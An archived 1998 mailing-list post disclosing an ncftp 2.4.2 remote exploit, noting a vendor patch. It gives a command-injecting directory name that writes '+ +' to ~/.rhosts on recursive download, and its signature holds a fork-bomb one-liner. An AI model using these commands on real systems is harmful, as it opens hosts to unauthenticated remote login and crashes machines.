[ http://www.rootshell.com/ ] A vendor patch is available at http://www.ncftp.com/download/ (Ncftp 2.4.3) From lcamtuf@boss.staszic.waw.pl Thu Mar 19 13:12:24 1998 Date: Thu, 19 Mar 1998 22:02:48 +0100 (CET) From: Michal Zalewski To: info@rootshell.com Subject: ncftp attack exploit Here's an ncftp 2.4.2 remote exploit. This time, I'm sure it hasn't been reported before and it isn't patched. Ok, how to exploit this vunerability? By the first, you should create evil directory somewhere, deeply into ftp server directory tree: [ftp@junk deeply]$ mkdir "\`echo -e \"echo + + >~\57.rhosts\">x;. x;rm -f x\`" >From now, every attempt of downloading directory structure with recursive get (eg. "get -R coolest_game_ever", that's one of the most popular ncftp features), will cause remote execution of "echo + +>~/.rhosts". Simple and pretty nice. _______________________________________________________________________ Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl] Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] =--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=